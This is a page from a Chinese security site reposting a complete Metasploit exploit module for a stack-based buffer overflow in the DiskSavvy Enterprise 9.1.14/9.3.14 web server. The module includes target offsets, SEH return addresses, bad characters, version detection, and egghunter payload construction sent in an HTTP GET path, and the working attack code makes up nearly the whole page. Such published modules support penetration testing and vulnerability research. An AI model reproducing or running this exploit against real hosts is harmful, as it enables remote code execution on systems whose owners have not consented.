首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
DiskSavvy Enterprise 9.1.14 / 9.3.14 GET Buffer Overflow
来源:metasploit.com 作者:Seljan 发布时间:2017-01-22  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::Egghunter
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DiskSavvy Enterprise GET Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow vulnerability
        in the web interface of DiskSavvy Enterprise v9.1.14 and v9.3.14,
        caused by improper bounds checking of the request path in HTTP GET
        requests sent to the built-in web server. This module has been
        tested successfully on Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'vportal',      # Vulnerability discovery and PoC
          'Gabor Seljan'  # Metasploit module
        ],
      'References'     =>
        [
          ['EDB', '40869']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars'   => "\x00\x09\x0a\x0d\x20",
          'Space'      => 500
        },
      'Targets'        =>
        [
          [
            'Automatic Targeting',
            {
              'auto' => true
            }
          ],
          [
            'DiskSavvy Enterprise v9.1.14',
            {
              'Offset' => 542,
              'Ret'    => 0x101142c0  # POP # POP # RET [libspp.dll]
            }
          ],
          [
            'DiskSavvy Enterprise v9.3.14',
            {
              'Offset' => 2478,
              'Ret'    => 0x101142ff  # POP # POP # RET [libspp.dll]
            }
          ]
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Dec 01 2016',
      'DefaultTarget'  => 0))
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/'
    )

    if res && res.code == 200
      version = res.body[/Disk Savvy Enterprise v[^<]*/]
      if version
        vprint_status("Version detected: #{version}")
        if version =~ /9\.(1|3)\.14/
          return Exploit::CheckCode::Appears
        end
        return Exploit::CheckCode::Detected
      end
    else
      vprint_error('Unable to determine due to a HTTP connection timeout')
      return Exploit::CheckCode::Unknown
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    mytarget = target

    if target['auto']
      mytarget = nil

      print_status('Automatically detecting the target...')

      res = send_request_cgi(
        'method' => 'GET',
        'uri'    => '/'
      )

      if res && res.code == 200
        if res.body =~ /Disk Savvy Enterprise v9\.1\.14/
          mytarget = targets[1]
        elsif res.body =~ /Disk Savvy Enterprise v9\.3\.14/
          mytarget = targets[2]
        end
      end

      if !mytarget
        fail_with(Failure::NoTarget, 'No matching target')
      end

      print_status("Selected target: #{mytarget.name}")
    end

    eggoptions = {
      checksum: true,
      eggtag: rand_text_alpha(4, payload_badchars)
    }

    hunter, egg = generate_egghunter(
      payload.encoded,
      payload_badchars,
      eggoptions
    )

    sploit =  make_nops(10)
    sploit << egg
    sploit << rand_text_alpha(mytarget['Offset'] - egg.length)
    sploit << generate_seh_record(mytarget.ret)
    sploit << make_nops(8)
    sploit << hunter
    sploit << rand_text_alpha(4500)

    print_status('Sending malicious request...')

    send_request_cgi(
      'method' => 'GET',
      'uri'    => sploit
    )
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SunOS 5.11 Remote ICMP Weaknes
·PageKit 1.0.10 - Password Rese
·Pirelli DRG A115 v3 ADSL Route
·Python 2.x Buffer Overflow
·Tenda ADSL2/2+ Modem D820R - U
·Microsoft Remote Desktop Clien
·SentryHD 02.01.12e - Privilege
·Oracle OpenJDK Runtime Environ
·BoZoN 2.4 - Remote Code Execut
·Firefox nsSMILTimeContainer::N
·dirLIST 0.3.0 - Arbitrary File
·Cisco WebEx - 'nativeMessaging
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved